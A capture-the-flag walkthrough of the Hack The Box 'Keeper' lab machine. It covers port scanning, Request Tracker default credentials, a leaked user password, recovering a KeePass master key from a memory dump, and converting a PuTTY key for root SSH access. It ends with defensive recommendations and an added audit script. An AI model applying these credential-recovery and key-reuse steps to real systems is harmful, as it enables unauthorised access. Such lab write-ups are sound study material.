[Machines] [Easy] Keeper: Request Tracker (RT) + KeePass master key leak from process memory residue + PuTTY PPK to id_rsa private key conversion for privilege escalation
2025-08-29 08:30:30
Keeper Penetration Testing Hands-On Tutorial
1. Information Gathering
1.1 Target Identification
- Target IP: 10.10.11.227
- Scan command:
ip='10.10.11.227'; itf='tun0'
# Liveness check: -Pn is omitted here because it marks every host as up,
# which would make the "unreachable" branch below dead code.
if nmap -sn "$ip" | grep -q "Host is up"; then
    echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"
    # Sweep all TCP and UDP ports with masscan and build a comma-separated list
    ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//')
    if [ -n "$ports" ]; then
        echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"
        # Version detection and default scripts against the open ports only
        nmap -Pn -sV -sC -p "$ports" "$ip"
    else
        echo -e "\e[31m[!] No open ports found on $ip.\e[0m"
    fi
else
    echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"
fi
1.2 Port Scan Results
- 22/tcp: OpenSSH 8.9p1 Ubuntu 3ubuntu0.3
  - SSH host keys:
    - ECDSA: 256 3539d439404b1f6186dd7c37bb4b989e
    - ED25519: 256 1ae972be8bb105d5effedd80d8efc066
- 80/tcp: nginx 1.18.0 (Ubuntu)
  - HTTP title: Login
  - Server header: nginx/1.18.0 (Ubuntu)
2. Web Application Penetration
2.1 Accessing Request Tracker (RT)
- Add the hostname to /etc/hosts:
echo '10.10.11.227 tickets.keeper.htb' >> /etc/hosts
- URL:
  - http://tickets.keeper.htb/
- Default credentials:
  - Username: root
  - Password: password
- Admin interface:
  - http://tickets.keeper.htb/rt/Admin/Users/Modify.html?id=27
- User password found there: Welcome2023!
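3. Initial Access
3.1 Obtaining the User Flag
- User flag location: 3e065105fb5ec6a9d4d4875f1fa99185
4. Privilege Escalation
4.1 Extracting the KeePass Master Key
- Download the KeePass-related files from the target system:
scp lnorgaard@10.10.11.227:/home/lnorgaard/RT30000.zip /tmp/
- Use the KeePass password dumper tool:
  - Tool URL: https://github.com/vdohney/keepass-password-dumper
- Install dependencies: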
#!/bin/bash
wget https://packages.microsoft.com/config/debian/11/packages-microsoft-prod.deb -O packages-microsoft-prod.deb
dpkg -i packages-microsoft-prod.deb
apt update
apt install -y dotnet-sdk-7.0
dotnet --version
- Extract the master key:
dotnet run KeePassDumpFull.dmp "dgrød med fløde"
- Decrypt the passcodes.kdbx file:
  - Using the KeeWeb online tool: https://app.keeweb.info/
  - Password: rødgrød med fløde
4.2 Converting PPK to an id_rsa Private Key
- Example PPK file contents:
PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81TEHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LMCj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1TuFVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQLxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
Private-Lines: 14
Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0
- Convert the PPK to OpenSSH format with puttygen:
puttygen ppk -O private-openssh -o id_rsa
- Log in over SSH with the converted private key:
ssh root@10.10.11.227 -i id_rsa
4.3 Obtaining the Root Flag
- Root flag location: 00172c33f60bd92c400e0bd2825d1301
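5. Summary of Key Points
- Information gathering techniques:
  - Fast port scanning with masscan
  - Service version detection with nmap
- Web application penetration:
  - Exploiting Request Tracker default credentials
  - Constructing the user management interface URL
- Privilege escalation methods:
  - KeePass process memory dump analysis
  - Extracting the master key with the KeePass password dumper
  - Converting a PPK-format private key to OpenSSH format
- Tool usage:
  - Installing and using the KeePass password dumper
  - Key format conversion with puttygen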
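6. Defensive Recommendations
- Security measures for KeePass:
  - Avoid keeping the KeePass process running for long periods
  - Use the secure desktop feature to prevent memory dumps
  - Change the master password regularly
- SSH security:
  - Disable direct root login
  - Protect private keys with a strong passphrase when using key authentication
  - Rotate SSH keys regularly
- Web application security:
  - Change default administrative credentials
  - Implement an account lockout policy
  - Restrict which IPs can reach the admin interface
- System security:
  - Regularly check for process memory dump risks
  - Monitor for anomalous login behavior
  - Apply the principle of least privilege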
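An added example, not part of the original write-up: a shell audit for the three conditions that sections 4 and 6 turn on, namely a PuTTY key saved with "Encryption: none", a process dump left beside a .kdbx database, and an sshd_config that still lets root log in. The function names and the sample tree (paths and file contents) are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example, not from the original write-up. Function names are illustrative.

# List PuTTY private keys saved without a passphrase. The PPK header is plain
# text, so read the first lines of each small file instead of trusting names.
find_unencrypted_ppk() {
    find "$1" -type f -size -64k 2>/dev/null | while IFS= read -r f; do
        hdr=$(head -n 3 "$f" 2>/dev/null | tr -d '\r\0')
        case "$hdr" in
            PuTTY-User-Key-File-*) ;;
            *) continue ;;
        esac
        if printf '%s\n' "$hdr" | grep -q '^Encryption: none$'; then
            printf '%s\n' "$f"
        fi
    done | sort
}

# List process dumps (*.dmp) stored in the same directory as a KeePass database.
find_dumps_near_kdbx() {
    find "$1" -type f -iname '*.kdbx' 2>/dev/null | while IFS= read -r db; do
        find "$(dirname "$db")" -maxdepth 1 -type f -iname '*.dmp'
    done | sort -u
}

# Succeed if this sshd_config lets root log in. sshd keeps the first value it reads;
# the default (prohibit-password) still accepts keys. Include/Match are not evaluated.
root_login_allowed() {
    val=$(awk 'tolower($1) == "permitrootlogin" { print tolower($2); exit }' "$1")
    [ "${val:-prohibit-password}" != "no" ]
}

# Constructed sample tree (hypothetical paths and contents) so this runs offline.
make_sample() {
    d=$(mktemp -d)
    mkdir -p "$d/home/user/ticket" "$d/etc/ssh"
    printf 'PuTTY-User-Key-File-3: ssh-rsa\nEncryption: none\n' > "$d/home/user/root.ppk"
    printf 'PuTTY-User-Key-File-3: ssh-rsa\nEncryption: aes256-cbc\n' > "$d/home/user/ok.ppk"
    : > "$d/home/user/ticket/passcodes.kdbx"
    : > "$d/home/user/ticket/KeePassDumpFull.dmp"
    printf '#PermitRootLogin no\nPasswordAuthentication yes\n' > "$d/etc/ssh/sshd_config"
    printf '%s\n' "$d"
}

root=$(make_sample)
echo "Unencrypted PPK keys:"; find_unencrypted_ppk "$root/home"
echo "Dumps beside a .kdbx:"; find_dumps_near_kdbx "$root/home"
root_login_allowed "$root/etc/ssh/sshd_config" && echo "root SSH login is permitted"
rm -rf "$root"
```

On a live host, `sshd -T` prints the effective PermitRootLogin value with Include and Match already resolved, so prefer it over parsing the file when it is available.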